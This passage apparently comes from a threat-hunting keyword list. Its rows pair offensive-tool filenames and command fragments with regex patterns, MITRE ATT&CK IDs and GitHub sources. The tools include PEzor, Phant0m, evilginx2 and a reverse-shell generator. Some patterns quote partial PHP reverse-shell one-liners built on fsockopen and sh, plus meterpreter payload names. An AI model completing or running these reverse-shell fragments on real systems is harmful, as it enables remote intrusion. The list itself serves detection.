"*PEzor*/Inject.c*",".{0,1000}PEzor.{0,1000}\/Inject\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Pezor*inject.hpp*",".{0,1000}Pezor.{0,1000}inject\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor.sh -*",".{0,1000}PEzor\.sh\s\-.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor.sh *.bin*",".{0,1000}PEzor\.sh\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor.sh -32*",".{0,1000}PEzor\.sh\s\-32.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor.sh -64*",".{0,1000}PEzor\.sh\s\-64.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor/*/bof.cpp*",".{0,1000}PEzor\/.{0,1000}\/bof\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor/*syscalls.hpp*",".{0,1000}PEzor\/.{0,1000}syscalls\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor\inject.cpp*",".{0,1000}PEzor\\inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*pfsense*reverse_root_shell_csrf/*",".{0,1000}pfsense.{0,1000}reverse_root_shell_csrf\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*pfx2john.py*",".{0,1000}pfx2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*PGh0bWw+DQoJPGhlYWQ+DQoJCTx0aXRsZT5JbmMuIFJhbnNvbXdhcmU8*",".{0,1000}PGh0bWw\+DQoJPGhlYWQ\+DQoJCTx0aXRsZT5JbmMuIFJhbnNvbXdhcmU8.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*pgpdisk2john.py*",".{0,1000}pgpdisk2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pgpsda2john.py*",".{0,1000}pgpsda2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pgpwde2john.py*",".{0,1000}pgpwde2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ph4nt0mbyt3/Darkside*",".{0,1000}ph4nt0mbyt3\/Darkside.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*ph4ntonn/Stowaway*",".{0,1000}ph4ntonn\/Stowaway.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","1","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*Phant0m scm 1*",".{0,1000}Phant0m\sscm\s1.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m scm 2*",".{0,1000}Phant0m\sscm\s2.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m wmi*",".{0,1000}Phant0m\swmi.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phant0m.cna*",".{0,1000}phant0m\.cna.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m_cobaltstrike*",".{0,1000}Phant0m_cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*phant0m-exe.*",".{0,1000}phant0m\-exe\..{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m-master.zip*",".{0,1000}Phant0m\-master\.zip.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phant0m-rdll*",".{0,1000}phant0m\-rdll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phantom_thread * shc *",".{0,1000}phantom_thread\s.{0,1000}\sshc\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*PhantomService.csproj*",".{0,1000}PhantomService\.csproj.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*PhantomService.exe*",".{0,1000}PhantomService\.exe.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*phillips321/adaudit*",".{0,1000}phillips321\/adaudit.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*phish_test.go*",".{0,1000}phish_test\.go.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*phish_windows_credentials.rb*",".{0,1000}phish_windows_credentials\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Phish-Creds.ps1*",".{0,1000}Phish\-Creds\.ps1.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*phishDomain = phishDomain +*",".{0,1000}phishDomain\s\=\sphishDomain\s\+.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","N/A","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*phishery*",".{0,1000}phishery.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1210 - T1565 - T1564.001","TA0002 - TA0007 - TA0010","N/A","N/A","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","10","960","210","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z" "*phishing-HTML-linter.*",".{0,1000}phishing\-HTML\-linter\..{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*phishlets *",".{0,1000}phishlets\s.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*phising_attack.py*",".{0,1000}phising_attack\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*phkbamefinggmakgklpkljjmgibohnba*",".{0,1000}phkbamefinggmakgklpkljjmgibohnba.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*phoneinfoga scan -n *",".{0,1000}phoneinfoga\sscan\s\-n\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PhoneInfoga*",".{0,1000}PhoneInfoga.{0,1000}","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","10","11992","3293","2024-04-28T20:01:04Z","2018-10-25T09:19:47Z" "*photon.py -u * -l 3 -t 100 --wayback*",".{0,1000}photon\.py\s\-u\s.{0,1000}\s\-l\s3\s\-t\s100\s\-\-wayback.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*php -f *.php -- -o myShell.php*",".{0,1000}php\s\-f\s.{0,1000}\.php\s\-\-\s\-o\smyShell\.php.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2329","742","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*PHP Meterpreter Stageless Reverse TCP*",".{0,1000}PHP\sMeterpreter\sStageless\sReverse\sTCP.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s*",".{0,1000}php\s\-r\s\'\$s\=socket_create\(AF_INET,SOCK_STREAM,SOL_TCP\)\;socket_bind\(\$s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);exec(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;exec\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);passthru(""sh ",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;passthru\(\""sh\s","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);popen(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;popen\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);shell_exec(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;shell_exec\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*);system(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;system\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -r '$sock=fsockopen(*,*proc_open(""sh"",*",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}proc_open\(\""sh\"",.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*php -S 0.0.0.0:9056 &*",".{0,1000}php\s\-S\s0\.0\.0\.0\:9056\s\&.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*php/meterpreter_reverse_tcp*",".{0,1000}php\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*php/reverse_php*",".{0,1000}php\/reverse_php.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*php_filter_chain_generator --chain *php 